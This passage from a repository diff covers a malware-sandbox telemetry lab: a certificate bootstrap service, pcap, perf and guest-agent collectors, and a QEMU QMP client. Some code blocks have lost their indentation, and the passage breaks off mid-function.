sudo /home/max/.env/wg-pki/scripts/init-cis490-client-ca.sh
# On each lab host: enroll via wg-enroll first, then:
sudo ./scripts/install-lab-host.sh
# Drop a TLS leaf from wg-pki at /etc/cis490/certs/, edit /etc/cis490/lab-host.toml.
sudo systemctl enable --now cis490-shipper cis490-orchestrator
```
For now both bootstrap scripts are scaffolds; the units and configs they
install live in `etc/`. The receiver itself works today
(`uv run python -m receiver --config etc/receiver.toml.example` — modify
paths).
The orchestrator service runs `tools/run_fleet.py --waves 1` per
invocation with `Restart=always`, giving a continuous stream of
fresh-sample episodes per host. The shipper picks them up as
`done.marker` files appear and PUTs them to `https://collector.wg`.
For mTLS leaf-cert minting: `spectral/wg-pki/scripts/issue-cis490-client-cert.sh <host_id>`.
</details>

0
bootstrap/__init__.py Normal file

65
bootstrap/__main__.py Normal file

@ -0,0 +1,65 @@
"""``cis490-bootstrap`` launcher.
Runs as root (needs CA private key access). Listens on 127.0.0.1:8446
behind Caddy's ``bootstrap.wg`` site — Caddy terminates TLS, this
service speaks plain HTTP on loopback only.
"""
from __future__ import annotations

import argparse
import logging
import sys
from pathlib import Path

import uvicorn

from bootstrap.app import make_app


def main(argv: list[str] | None = None) -> int:
    p = argparse.ArgumentParser(prog="cis490-bootstrap")
    p.add_argument("--listen-host", default="127.0.0.1")
    p.add_argument("--listen-port", type=int, default=8446)
    p.add_argument(
        "--issuer-script",
        type=Path,
        default=Path("/home/max/.env/wg-pki/scripts/issue-cis490-client-cert.sh"),
        help="Path to the wg-pki leaf-cert mint script.",
    )
    p.add_argument(
        "--issued-root",
        type=Path,
        default=Path("/home/max/.env/wg-pki/issued"),
        help="Where minted tarballs are cached.",
    )
    p.add_argument("--log-level", default="info")
    args = p.parse_args(argv)

    logging.basicConfig(
        level=getattr(logging, args.log_level.upper(), logging.INFO),
        format="%(asctime)s %(levelname)s %(name)s %(message)s",
    )
    log = logging.getLogger("cis490.bootstrap.main")

    if not args.issuer_script.exists():
        log.error("issuer script missing: %s", args.issuer_script)
        return 2

    app = make_app(
        issuer_script=args.issuer_script,
        issued_root=args.issued_root,
    )
    log.info("listening on %s:%d", args.listen_host, args.listen_port)
    uvicorn.run(
        app,
        host=args.listen_host,
        port=args.listen_port,
        log_level=args.log_level,
        access_log=True,
    )
    return 0


if __name__ == "__main__":
    sys.exit(main())

146
bootstrap/app.py Normal file

@ -0,0 +1,146 @@
"""``cis490-bootstrap`` — auto-issue mTLS leaf certs to enrolled lab hosts.

This is the chicken-and-egg fix for first-time lab-host setup. A
freshly wg-enrolled device has WG access (and trusts the wg-pki CA)
but has no client cert yet, so it can't authenticate to the
mTLS-protected ``collector.wg``. This service exposes a *plain-TLS*
(no client-auth) endpoint that the lab host can call once during
``install-lab-host.sh`` to retrieve its leaf cert tarball.

Trust boundary: anything that reaches ``bootstrap.wg`` has already
passed iptmonads' WG-membership check at L4. No further
authentication is required for the bootstrap pull: by the time a
caller can connect at all, they're a peer the operator authorized.

The privilege boundary, on the other hand, is real: minting certs
requires the wg-pki CA private key (root-only at
``/var/lib/wg-pki/cis490-client-ca/ca.key``). This service therefore
runs as root in a tight sandbox (see ``etc/cis490-bootstrap.service``)
and shells out to ``issue-cis490-client-cert.sh`` for each mint.

Endpoints:

  GET /v1/cert/{host_id}    return tarball of {ca.crt, leaf.pem, leaf.key}
                            for ``host_id``. Cached; successive calls
                            return the same bytes.
  GET /v1/health            liveness probe (no auth needed).

Each mint is logged with the source IP (after Caddy's X-Real-IP
forward) so the operator has an audit trail of which devices have
fetched which certs.
"""
from __future__ import annotations

import logging
import re
import subprocess
import time
from pathlib import Path
from typing import Awaitable, Callable

from starlette.applications import Starlette
from starlette.requests import Request
from starlette.responses import FileResponse, JSONResponse, Response
from starlette.routing import Route

log = logging.getLogger("cis490.bootstrap")

# Sane host_id charset (same rules the receiver enforces), mirrored
# here so mint requests can't smuggle path traversal in.
_HOST_ID_RE = re.compile(r"[A-Za-z0-9_.-]{1,64}")


def _is_valid_host_id(s: str) -> bool:
    # "." and ".." satisfy the charset but would resolve outside
    # issued_root, so reject them explicitly. fullmatch also refuses a
    # trailing newline, which "$" with match() would let through.
    return s not in {".", ".."} and _HOST_ID_RE.fullmatch(s) is not None
def make_app(
*,
issuer_script: Path,
issued_root: Path,
rate_limit_window_s: float = 5.0,
) -> Starlette:
"""Build the Starlette app. Wired by the production launcher in
``bootstrap/__main__.py``; tests can pass synthetic paths."""
issued_root.mkdir(parents=True, exist_ok=True)
# Coarse per-IP rate limiter to make a casual scan annoying. Not
# a real defense — the WG mesh is the actual perimeter.
last_request: dict[str, float] = {}
async def health(request: Request) -> Response:
return JSONResponse({"status": "ok"})
async def get_cert(request: Request) -> Response:
host_id: str = request.path_params["host_id"]
if not _is_valid_host_id(host_id):
return JSONResponse({"error": "bad host_id"}, status_code=400)
# Caddy forwards the original WG-side IP via X-Real-IP /
# X-Forwarded-For; fall back to the direct peer if running
# without Caddy in front (tests).
src = (
request.headers.get("x-real-ip")
or (request.headers.get("x-forwarded-for") or "").split(",")[0].strip()
or (request.client.host if request.client else "?")
)
now = time.monotonic()
prev = last_request.get(src, 0.0)
if (now - prev) < rate_limit_window_s:
return JSONResponse(
{"error": "rate limited; back off"},
status_code=429,
)
last_request[src] = now
tar_path = issued_root / host_id / f"{host_id}.tar"
if not tar_path.exists():
log.info("minting cert for host_id=%s src=%s", host_id, src)
try:
subprocess.run(
[
str(issuer_script), host_id,
"--out-dir", str(issued_root / host_id),
],
check=True,
capture_output=True,
text=True,
timeout=30,
)
except subprocess.CalledProcessError as e:
log.error("issue script failed for %s: rc=%d stderr=%s",
host_id, e.returncode, e.stderr[:500])
return JSONResponse(
{"error": "mint failed", "detail": e.stderr[:500]},
status_code=500,
)
except (OSError, subprocess.TimeoutExpired) as e:
log.exception("issue script transport error for %s", host_id)
return JSONResponse(
{"error": f"transport: {e}"},
status_code=500,
)
else:
log.info("cache hit for host_id=%s src=%s", host_id, src)
if not tar_path.exists():
return JSONResponse({"error": "tarball not produced"}, status_code=500)
return FileResponse(
tar_path,
media_type="application/x-tar",
filename=f"{host_id}.tar",
headers={
"X-Cis490-Host-Id": host_id,
"X-Cis490-Cert-Source-IP": src,
},
)
routes = [
Route("/v1/health", health, methods=["GET"]),
Route("/v1/cert/{host_id}", get_cert, methods=["GET"]),
]
return Starlette(routes=routes)
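
The per-source rate limit in `get_cert` can be pictured as a small standalone helper. This is only a sketch under assumptions: the class name `WindowLimiter`, its `allow()` method and the injectable `clock` are hypothetical and not part of the commit. It also prunes stale entries, which the in-handler dict above does not do.

```python
import time
from typing import Callable


class WindowLimiter:
    """Hypothetical helper: at most one accepted request per source per window."""

    def __init__(self, window_s: float,
                 clock: Callable[[], float] = time.monotonic) -> None:
        self.window_s = window_s
        self.clock = clock
        self._last: dict[str, float] = {}

    def allow(self, src: str) -> bool:
        now = self.clock()
        # Forget sources whose window has expired, so the table is bounded
        # by the number of distinct sources seen within one window.
        stale = [k for k, t in self._last.items() if now - t >= self.window_s]
        for k in stale:
            del self._last[k]
        if src in self._last:
            return False  # still inside this source's window
        self._last[src] = now
        return True
```

Injecting the clock keeps the helper testable without sleeping; a handler would call `allow(src)` and answer 429 when it returns `False`.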

collectors/guest_agent.py Normal file

@ -0,0 +1,119 @@
"""Source 5 (feature, deployable): in-guest agent reader.
QEMU exposes a virtio-serial channel two ways:
- inside the guest: ``/dev/virtio-ports/cis490.guest.agent``
- on the host: a unix socket at ``$RUN_DIR/agent.sock``
The in-guest agent (`vm/guest-agent/cis490_agent.py`) writes one
JSON-lines row per tick into the guest-side device. Bytes traverse the
virtio bus and surface on the host socket. This collector reads them,
re-stamps with the host's monotonic clock (so rows align with all
other telemetry on a single timeline), and persists to
``telemetry-guest.jsonl``.
Why re-stamp? The agent's clock is the *guest* clock, which can drift
from the host (rare in KVM, but happens during live-migration tests
and on heavy host load). The original guest timestamps stay in the row
under ``t_guest_*`` so analysts can quantify drift if they care.
This source is the **deployable** side: every row is tagged
``available_in_deployment: true``. See docs/threat-model.md.
"""
from __future__ import annotations
import json
import logging
import socket
import threading
import time
from pathlib import Path
log = logging.getLogger("cis490.collectors.guest_agent")
SOURCE = "guest_agent"
AVAILABLE_IN_DEPLOYMENT = True
def _connect(socket_path: Path, timeout_s: float) -> socket.socket | None:
deadline = time.monotonic() + timeout_s
last_err: OSError | None = None
while time.monotonic() < deadline:
try:
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
s.settimeout(2.0)
s.connect(str(socket_path))
return s
except OSError as e:
last_err = e
time.sleep(0.5)
if last_err is not None:
log.warning("guest-agent socket %s never came up: %s", socket_path, last_err)
return None
def _stamp(row: dict, t_mono_origin_ns: int) -> dict:
    """Stamp ``row`` with host-clock ``t_mono_ns`` / ``t_wall_ns``.
    Guest-clock values the agent reports under ``t_guest_*`` pass
    through unchanged for drift analysis; any ``t_mono_ns`` /
    ``t_wall_ns`` the agent sent is overwritten."""
    out = dict(row)
    # Guarantee the t_guest_* keys exist (as None) even when the agent
    # omitted them, so every row carries the same columns.
    out.setdefault("t_guest_mono_ns", None)
    out.setdefault("t_guest_wall_ns", None)
    out["t_mono_ns"] = time.monotonic_ns() - t_mono_origin_ns
    out["t_wall_ns"] = time.time_ns()
    out.setdefault("source", SOURCE)
    out.setdefault("available_in_deployment", AVAILABLE_IN_DEPLOYMENT)
    return out
def run_loop(
socket_path: str | Path,
output_path: Path,
t_mono_origin_ns: int,
stop_event: threading.Event,
*,
connect_timeout_s: float = 30.0,
) -> int:
"""Read agent JSON-lines from the host-side virtio-serial unix
socket. Re-stamp each row with the host clock and persist."""
sock_path = Path(socket_path)
sock = _connect(sock_path, connect_timeout_s)
if sock is None:
return 0
rows = 0
output_path.parent.mkdir(parents=True, exist_ok=True)
buf = b""
try:
with output_path.open("a", buffering=1) as f:
while not stop_event.is_set():
try:
sock.settimeout(0.5)
chunk = sock.recv(8192)
except socket.timeout:
continue
except OSError as e:
log.warning("guest-agent recv failed: %s", e)
break
if not chunk:
log.info("guest-agent socket closed")
break
buf += chunk
while b"\n" in buf:
line, _, buf = buf.partition(b"\n")
line = line.strip()
if not line:
continue
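                    try:
                        row = json.loads(line)
                    except ValueError as e:
                        # Covers JSONDecodeError and UnicodeDecodeError.
                        log.warning("dropping malformed guest-agent line: %s", e)
                        continue
                    if not isinstance(row, dict):
                        log.warning("dropping non-object guest-agent line")
                        continue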
f.write(json.dumps(_stamp(row, t_mono_origin_ns)) + "\n")
rows += 1
finally:
try:
sock.close()
except OSError:
pass
return rows
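
The framing step in `run_loop` (accumulate bytes, split on newlines, keep the unfinished tail for the next read) can be isolated as a pure function. A minimal sketch, assuming a hypothetical helper name `feed`; it is not part of the commit and only mirrors the buffering logic above.

```python
import json


def feed(buf: bytes, chunk: bytes) -> tuple[list[dict], bytes]:
    """Append ``chunk`` to ``buf``; return (complete JSON object rows, leftover)."""
    buf += chunk
    rows: list[dict] = []
    while b"\n" in buf:
        line, _, buf = buf.partition(b"\n")
        line = line.strip()
        if not line:
            continue
        try:
            obj = json.loads(line)
        except ValueError:
            continue  # malformed JSON or undecodable bytes: drop the line
        if isinstance(obj, dict):
            rows.append(obj)  # only JSON objects count as telemetry rows
    return rows, buf
```

Because the leftover bytes are returned rather than stored, a row that straddles two `recv()` calls is reassembled on the second call.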

collectors/pcap.py Normal file

@ -0,0 +1,288 @@
"""Source 4 (feature, deployable): bridge-side pcap + bucketed netflow.
Captures packets on the host-only ``br-malware`` bridge during an
episode, writes the raw pcap, and produces a bucketed JSONL file the
trainer can consume directly.
The capture is **gateway-side**: the orchestrator sees the same
packets a real upstream router/gateway would see in deployment, so
features derived here transfer 1:1 to the deployment-time gateway
observer.
Implementation:
- ``run_capture()`` spawns ``tcpdump -i <bridge> -U -w <out.pcap>``
as a subprocess for the episode duration. ``-U`` flushes per
packet so the file is consumable mid-flight.
- ``bucketize()`` reads a finished pcap and emits 100 ms-bucketed
rows into ``netflow.jsonl``. Pure-Python pcap parser (no scapy /
dpkt dependency); decodes Ethernet + IPv4 + TCP/UDP enough to fill
the schema in docs/data-model.md.
The pure-Python parser is intentionally minimal: it does NOT do
fragment reassembly, IPv6, VLAN tags, or anything fancy. It handles
the cases that occur on a host-only bridge for malware behaviour:
plain Ethernet II, IPv4, TCP/UDP. Other frames are still counted at
the byte/packet level but skipped for protocol-specific stats.
"""
from __future__ import annotations
import json
import logging
import os
import struct
import subprocess
import threading
import time
from collections import defaultdict
from dataclasses import dataclass
from pathlib import Path
log = logging.getLogger("cis490.collectors.pcap")
SOURCE = "bridge_pcap"
AVAILABLE_IN_DEPLOYMENT = True
# Pcap file-level header
_PCAP_GLOBAL_HDR = "<IHHiIII"
_PCAP_GLOBAL_HDR_SIZE = 24
_PCAP_REC_HDR = "<IIII"
_PCAP_REC_HDR_SIZE = 16
_PCAP_MAGIC_USEC = 0xa1b2c3d4
_PCAP_MAGIC_NSEC = 0xa1b23c4d # nanosecond resolution variant
# ---------------------------------------------------------------------------
# Capture
# ---------------------------------------------------------------------------
@dataclass
class CaptureHandle:
proc: subprocess.Popen
pcap_path: Path
bridge: str
started_mono_ns: int
def run_capture(
*,
bridge: str,
pcap_path: Path,
snaplen: int = 256,
bpf: str | None = None,
) -> CaptureHandle:
"""Start a tcpdump capture on ``bridge``. Returns a handle the
caller stops via ``stop_capture()``."""
pcap_path.parent.mkdir(parents=True, exist_ok=True)
args = ["tcpdump", "-i", bridge, "-U", "-s", str(snaplen), "-w", str(pcap_path)]
if bpf:
args.append(bpf)
log.info("starting pcap: %s", " ".join(args))
proc = subprocess.Popen(
args,
stdout=subprocess.DEVNULL,
stderr=subprocess.PIPE,
# tcpdump may need root or CAP_NET_RAW. We don't elevate here.
)
return CaptureHandle(
proc=proc, pcap_path=pcap_path, bridge=bridge,
started_mono_ns=time.monotonic_ns(),
)
def stop_capture(handle: CaptureHandle, *, timeout_s: float = 5.0) -> int:
"""SIGINT tcpdump (the Right Signal — flushes buffers + exits 0).
Returns the process exit code."""
proc = handle.proc
if proc.poll() is None:
proc.send_signal(2) # SIGINT
try:
proc.wait(timeout=timeout_s)
except subprocess.TimeoutExpired:
proc.kill()
proc.wait(timeout=timeout_s)
return proc.returncode
# ---------------------------------------------------------------------------
# Pure-Python pcap parser
# ---------------------------------------------------------------------------
def _iter_pcap(path: Path):
"""Yield ``(t_pkt_ns, frame_bytes)`` for every record in a pcap
file. Tolerates either microsecond or nanosecond magics."""
with path.open("rb") as f:
hdr = f.read(_PCAP_GLOBAL_HDR_SIZE)
if len(hdr) < _PCAP_GLOBAL_HDR_SIZE:
return
magic = struct.unpack("<I", hdr[:4])[0]
if magic == _PCAP_MAGIC_USEC:
sub_mult = 1000 # us → ns
elif magic == _PCAP_MAGIC_NSEC:
sub_mult = 1
else:
log.warning("unknown pcap magic %#x in %s", magic, path)
return
while True:
rec = f.read(_PCAP_REC_HDR_SIZE)
if len(rec) < _PCAP_REC_HDR_SIZE:
return
ts_sec, ts_sub, caplen, _ = struct.unpack(_PCAP_REC_HDR, rec)
data = f.read(caplen)
if len(data) < caplen:
return
t_ns = ts_sec * 1_000_000_000 + ts_sub * sub_mult
yield t_ns, data
def _decode(frame: bytes) -> dict:
"""Decode an Ethernet/IPv4/{TCP,UDP} frame to a flat dict. Unknown
protocols return only the ethertype + lengths."""
out: dict = {"size": len(frame)}
if len(frame) < 14:
return out
ethertype = struct.unpack(">H", frame[12:14])[0]
out["ethertype"] = ethertype
if ethertype != 0x0800: # not IPv4 — count, don't decode further
return out
ip = frame[14:]
if len(ip) < 20:
return out
ihl = (ip[0] & 0x0F) * 4
if ihl < 20 or len(ip) < ihl:
return out
proto = ip[9]
src = ip[12:16]
dst = ip[16:20]
out["ip_proto"] = proto
out["src_ip"] = ".".join(str(b) for b in src)
out["dst_ip"] = ".".join(str(b) for b in dst)
payload = ip[ihl:]
if proto == 6 and len(payload) >= 20: # TCP
sport, dport, _, _, off_flags = struct.unpack(">HHIIH", payload[:14])
flags = off_flags & 0x003F
out["src_port"] = sport
out["dst_port"] = dport
out["tcp_flags"] = flags # FIN=1 SYN=2 RST=4 PSH=8 ACK=16 URG=32
elif proto == 17 and len(payload) >= 8: # UDP
sport, dport, _, _ = struct.unpack(">HHHH", payload[:8])
out["src_port"] = sport
out["dst_port"] = dport
return out
def bucketize(
pcap_path: Path,
netflow_path: Path,
*,
bucket_ms: int = 100,
t_mono_origin_ns: int = 0,
bridge_ip: str = "10.200.0.1",
) -> int:
"""Read a pcap and emit one row per ``bucket_ms`` window into
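``netflow.jsonl``. The ``in/out`` direction is from the bridge
perspective (host = ``bridge_ip``):
    out = packet whose src is the host-side address (host → guest)
    in  = anything else seen on the bridge (guest → host or
          guest-to-guest)
``t_mono_origin_ns`` is subtracted from the packet timestamps, so it
must be in the capture's own timebase (wall-clock epoch ns for a
default tcpdump capture).
Returns the number of rows written."""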
if not pcap_path.exists():
return 0
bucket_ns = bucket_ms * 1_000_000
netflow_path.parent.mkdir(parents=True, exist_ok=True)
rows = 0
bucket_start: int | None = None
agg: dict = _empty_bucket()
with netflow_path.open("a", buffering=1) as out:
for t_pkt_ns, frame in _iter_pcap(pcap_path):
d = _decode(frame)
# Establish first bucket origin on first packet.
if bucket_start is None:
bucket_start = t_pkt_ns - (t_pkt_ns % bucket_ns)
while t_pkt_ns >= bucket_start + bucket_ns:
_flush(out, agg, bucket_start, bucket_ns, t_mono_origin_ns)
rows += 1
agg = _empty_bucket()
bucket_start += bucket_ns
_accumulate(agg, d, bridge_ip)
if bucket_start is not None and any(v for v in agg.values() if v):
_flush(out, agg, bucket_start, bucket_ns, t_mono_origin_ns)
rows += 1
return rows
def _empty_bucket() -> dict:
return {
"pkts_in": 0, "pkts_out": 0,
"bytes_in": 0, "bytes_out": 0,
"syn_count": 0, "fin_count": 0, "rst_count": 0,
"udp_count": 0, "tcp_count": 0,
"dns_query_count": 0,
"dst_ips": set(), "dst_ports": set(),
"tcp_new_flows": 0,
}
def _accumulate(agg: dict, d: dict, bridge_ip: str) -> None:
sz = d.get("size", 0)
is_out = d.get("src_ip") == bridge_ip
if is_out:
agg["pkts_out"] += 1
agg["bytes_out"] += sz
else:
agg["pkts_in"] += 1
agg["bytes_in"] += sz
proto = d.get("ip_proto")
if proto == 6:
agg["tcp_count"] += 1
flags = d.get("tcp_flags", 0)
if flags & 0x02: # SYN
agg["syn_count"] += 1
if not (flags & 0x10): # SYN without ACK = new flow
agg["tcp_new_flows"] += 1
if flags & 0x01:
agg["fin_count"] += 1
if flags & 0x04:
agg["rst_count"] += 1
elif proto == 17:
agg["udp_count"] += 1
if d.get("dst_port") == 53:
agg["dns_query_count"] += 1
dst = d.get("dst_ip")
if dst:
agg["dst_ips"].add(dst)
dport = d.get("dst_port")
if dport is not None:
agg["dst_ports"].add(dport)
def _flush(out, agg: dict, bucket_start_ns: int, bucket_ns: int, t_mono_origin_ns: int) -> None:
row = {
"t_mono_ns": bucket_start_ns - t_mono_origin_ns,
"t_wall_ns": bucket_start_ns,
"source": SOURCE,
"available_in_deployment": AVAILABLE_IN_DEPLOYMENT,
"bucket_ms": bucket_ns // 1_000_000,
"pkts_in": agg["pkts_in"], "pkts_out": agg["pkts_out"],
"bytes_in": agg["bytes_in"], "bytes_out": agg["bytes_out"],
"syn_count": agg["syn_count"],
"fin_count": agg["fin_count"],
"rst_count": agg["rst_count"],
"udp_count": agg["udp_count"],
"tcp_count": agg["tcp_count"],
"dns_query_count": agg["dns_query_count"],
"unique_dst_ips": len(agg["dst_ips"]),
"unique_dst_ports": len(agg["dst_ports"]),
"tcp_new_flows": agg["tcp_new_flows"],
}
out.write(json.dumps(row) + "\n")
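
The windowing in `bucketize()` aligns the first bucket to a multiple of the bucket width and emits a row for every window up to the last packet, including empty gaps. A minimal sketch of just that arithmetic, reduced to packet counts; the function name `bucket_counts` is hypothetical and the input is assumed to be sorted, as timestamps in a capture file normally are.

```python
def bucket_counts(timestamps_ns: list[int],
                  bucket_ms: int = 100) -> list[tuple[int, int]]:
    """Return (bucket_start_ns, packet_count) per window, gaps included."""
    bucket_ns = bucket_ms * 1_000_000
    out: list[tuple[int, int]] = []
    start: int | None = None
    count = 0
    for t in timestamps_ns:
        if start is None:
            # Align the first bucket to a multiple of the bucket width.
            start = t - (t % bucket_ns)
        # Close every window that ends at or before this packet.
        while t >= start + bucket_ns:
            out.append((start, count))
            count = 0
            start += bucket_ns
        count += 1
    if start is not None and count:
        out.append((start, count))  # final partial window
    return out
```

Emitting the empty windows keeps rows evenly spaced in time, which is convenient when joining against the other collectors' fixed-interval rows.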

collectors/perf_qemu.py Normal file

@ -0,0 +1,201 @@
"""Source 3 (oracle): ``perf stat -p <qemu_pid>`` sampler.
Spawns ``perf stat`` in interval-JSON mode against the qemu pid and
aggregates the per-event counter values into per-interval telemetry
rows. Unlike the /proc and QMP collectors, perf needs CAP_SYS_ADMIN
or ``kernel.perf_event_paranoid <= 1`` to read counters for a process
the collector doesn't own — typically true on a lab host running
QEMU under the cis490 service user.
Source 3 is **oracle-only**: perf counters are not available on a
deployed device. Every row carries ``available_in_deployment: false``.
The events we ask for are the small canonical set named in
docs/data-model.md:
cycles, instructions, cache-references, cache-misses,
branches, branch-misses, page-faults, context-switches
Anything perf can't count on the host (e.g. cache-misses without
hardware support) is reported as ``null`` in the row.
"""
from __future__ import annotations
import json
import logging
import shutil
import subprocess
import threading
import time
from pathlib import Path
log = logging.getLogger("cis490.collectors.perf_qemu")
SOURCE = "host_perf"
AVAILABLE_IN_DEPLOYMENT = False
DEFAULT_EVENTS = (
"cycles",
"instructions",
"cache-references",
"cache-misses",
"branches",
"branch-misses",
"page-faults",
"context-switches",
)
def perf_available() -> bool:
return shutil.which("perf") is not None
def _coerce_int(s: str | int | None) -> int | None:
if s is None:
return None
if isinstance(s, int):
return s
s = s.strip()
if not s or s in ("<not counted>", "<not supported>"):
return None
# perf prints comma-separated thousands by default; we asked -j so
# we usually get plain numbers, but guard for both shapes.
s = s.replace(",", "")
try:
return int(s)
except ValueError:
try:
return int(float(s))
except ValueError:
return None
def _build_row(t_mono_origin_ns: int, interval_s: float, agg: dict[str, int]) -> dict:
cycles = agg.get("cycles")
insns = agg.get("instructions")
cache_refs = agg.get("cache-references")
cache_miss = agg.get("cache-misses")
ipc = (insns / cycles) if (cycles and insns) else None
miss_rate = (cache_miss / cache_refs) if (cache_refs and cache_miss is not None) else None
return {
"t_mono_ns": time.monotonic_ns() - t_mono_origin_ns,
"t_wall_ns": time.time_ns(),
"source": SOURCE,
"available_in_deployment": AVAILABLE_IN_DEPLOYMENT,
"interval_s": interval_s,
"cycles": cycles,
"instructions": insns,
"cache_references": cache_refs,
"cache_misses": cache_miss,
"branches": agg.get("branches"),
"branch_misses": agg.get("branch-misses"),
"page_faults": agg.get("page-faults"),
"context_switches": agg.get("context-switches"),
"ipc": ipc,
"cache_miss_rate": miss_rate,
}
def parse_perf_event_line(line: str) -> dict | None:
"""Parse one ``perf stat -j`` event line. Returns None for blanks
and for non-JSON status lines that perf occasionally interleaves
with the event stream."""
line = line.strip()
if not line.startswith("{"):
return None
try:
return json.loads(line)
except json.JSONDecodeError:
return None
def run_loop(
pid: int,
output_path: Path,
t_mono_origin_ns: int,
interval_ms: int,
stop_event: threading.Event,
*,
events: tuple[str, ...] = DEFAULT_EVENTS,
) -> int:
"""Spawn perf stat -j against ``pid`` and stream rows until stop.
Returns the number of rows written."""
if not perf_available():
log.warning("perf binary not on PATH — perf collector disabled")
return 0
cmd = [
"perf", "stat",
"-p", str(pid),
"-I", str(interval_ms),
"-j",
"-e", ",".join(events),
]
log.info("starting perf: %s", " ".join(cmd))
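    try:
        proc = subprocess.Popen(
            cmd,
            stdout=subprocess.PIPE,
            # perf stat reports counters on stderr unless redirected
            # (--log-fd / -o). Merging stderr into stdout lets the
            # reader below see the JSON lines on either stream and
            # leaves no undrained pipe for perf to block on.
            stderr=subprocess.STDOUT,
            bufsize=1,
            text=True,
        )
    except (FileNotFoundError, PermissionError) as e:
        log.warning("perf launch failed: %s", e)
        return 0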
rows = 0
output_path.parent.mkdir(parents=True, exist_ok=True)
cur_interval: float | None = None
agg: dict[str, int] = {}
def _flush() -> None:
nonlocal rows
if cur_interval is None or not agg:
return
row = _build_row(t_mono_origin_ns, cur_interval, agg)
out_f.write(json.dumps(row) + "\n")
rows += 1
try:
with output_path.open("a", buffering=1) as out_f:
# perf interleaves events and writes to stdout in -j mode.
# We read line by line until the process exits (which
# happens when we kill it on stop, or when the target pid
# disappears and perf's internal -p polling notices).
assert proc.stdout is not None
for line in proc.stdout:
if stop_event.is_set():
break
evt = parse_perf_event_line(line)
if evt is None:
continue
interval = evt.get("interval")
event_name = evt.get("event")
value = _coerce_int(evt.get("counter-value"))
if interval is None or event_name is None:
continue
# perf emits one JSON per (event, interval); a new
# interval value means we should flush the previous row.
if cur_interval is not None and interval != cur_interval:
_flush()
agg = {}
cur_interval = interval
if value is not None:
agg[event_name] = value
# End of stream — flush the last partial row.
_flush()
finally:
if proc.poll() is None:
proc.terminate()
try:
proc.wait(timeout=3.0)
except subprocess.TimeoutExpired:
proc.kill()
proc.wait(timeout=2.0)
return rows
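
The grouping rule in `run_loop` (one JSON line per event, a change in `interval` closes the previous row) can be exercised without running perf. This is a sketch under assumptions: `rows_by_interval` is a hypothetical name, and the sample lines in the usage note are synthetic, shaped only around the three keys the collector reads (`interval`, `event`, `counter-value`); real perf output carries more fields.

```python
import json
from typing import Iterable, Iterator


def rows_by_interval(lines: Iterable[str]) -> Iterator[dict]:
    """Group per-event JSON lines into one dict per interval value."""
    cur = None
    agg: dict[str, int] = {}
    for line in lines:
        line = line.strip()
        if not line.startswith("{"):
            continue  # status text, blank lines
        try:
            evt = json.loads(line)
        except json.JSONDecodeError:
            continue
        interval, name = evt.get("interval"), evt.get("event")
        if interval is None or name is None:
            continue
        if cur is not None and interval != cur:
            if agg:
                yield {"interval_s": cur, **agg}
            agg = {}
        cur = interval
        raw = str(evt.get("counter-value")).replace(",", "")
        try:
            agg[name] = int(float(raw))
        except ValueError:
            pass  # e.g. "<not counted>": leave the event out of this row
    if cur is not None and agg:
        yield {"interval_s": cur, **agg}
```

Feeding it two synthetic intervals, with one status line and one uncounted event mixed in, yields two rows; the uncounted event is simply absent from the second row.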

collectors/qmp.py Normal file

@ -0,0 +1,262 @@
"""Source 2 (oracle): QEMU QMP sampler.
Connects to the QEMU monitor protocol socket exposed by the launcher
($RUN_DIR/qmp.sock) and periodically queries the hypervisor for
per-VM stats that don't show up in /proc/<qemu_pid>:
- per-disk block I/O (rd_bytes, wr_bytes, rd_ops, wr_ops)
- VM run state (running / paused / shutdown)
- per-netdev tx/rx counters (when available)
- KVM stat counters (when available; introspection differs by qemu
version, so anything we can't read is skipped silently)
This source is **oracle-only**: it does not exist on a deployed
device. Every row carries ``available_in_deployment: false``.
Wire format: QMP is line-delimited JSON. The handshake is fixed:
    server → {"QMP": {capabilities: [...], version: ...}}
    client → {"execute": "qmp_capabilities"}
    server → {"return": {}}
    (client may now issue commands)
We use a dedicated synchronous client because QMP is request/response
and we don't need pipelining; one query batch per tick keeps the
on-disk schema simple.
"""
from __future__ import annotations
import json
import logging
import socket
import threading
import time
from dataclasses import dataclass
from pathlib import Path
from typing import Any
log = logging.getLogger("cis490.collectors.qmp")
SOURCE = "host_qmp"
AVAILABLE_IN_DEPLOYMENT = False
class QMPError(RuntimeError):
pass
@dataclass
class _SockReader:
sock: socket.socket
buf: bytes = b""
def read_line(self, timeout_s: float = 5.0) -> str:
deadline = time.monotonic() + timeout_s
while b"\n" not in self.buf:
self.sock.settimeout(max(0.1, deadline - time.monotonic()))
try:
chunk = self.sock.recv(8192)
except socket.timeout as e:
raise QMPError(f"QMP read timed out: {e}") from e
if not chunk:
raise QMPError("QMP connection closed by peer")
self.buf += chunk
line, _, rest = self.buf.partition(b"\n")
self.buf = rest
return line.decode("utf-8", errors="replace")
class QMPClient:
"""Tiny synchronous QMP client over a unix socket."""
def __init__(self, socket_path: str | Path) -> None:
self.path = str(socket_path)
self._sock: socket.socket | None = None
self._reader: _SockReader | None = None
def connect(self, timeout_s: float = 5.0) -> dict[str, Any]:
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
s.settimeout(timeout_s)
s.connect(self.path)
self._sock = s
self._reader = _SockReader(s)
# Read greeting.
greeting = json.loads(self._reader.read_line(timeout_s=timeout_s))
if "QMP" not in greeting:
raise QMPError(f"unexpected QMP greeting: {greeting!r}")
# Negotiate capabilities (no flags requested).
self.execute("qmp_capabilities")
return greeting["QMP"]
def execute(self, command: str, **arguments: Any) -> Any:
if self._sock is None or self._reader is None:
raise QMPError("not connected")
msg: dict[str, Any] = {"execute": command}
if arguments:
msg["arguments"] = arguments
body = (json.dumps(msg) + "\n").encode("utf-8")
self._sock.sendall(body)
# QMP can interleave async events with the response — drain
# until we see the matching {"return": ...} or {"error": ...}.
for _ in range(64): # bounded to avoid an infinite loop on bugs
line = self._reader.read_line()
if not line.strip():
continue
resp = json.loads(line)
if "return" in resp:
return resp["return"]
if "error" in resp:
raise QMPError(f"{command}: {resp['error']}")
# Otherwise it's an async event; ignore and keep reading.
raise QMPError(f"{command}: too many async events without a response")
# ---- snapshot / revert (via human-monitor-command) -----------------
def savevm(self, name: str) -> str:
"""``savevm <name>`` — capture a live VM snapshot inside the
qcow2. Returns the monitor's reply (empty string on success).
Requires the disk to be qcow2 (our launchers always are)."""
return self._hmp(f"savevm {name}")
def loadvm(self, name: str) -> str:
"""``loadvm <name>`` — restore the named snapshot. The guest
is paused, restored, and resumed; collectors continue
sampling and just see a sharp transition."""
return self._hmp(f"loadvm {name}")
def _hmp(self, cmd: str) -> str:
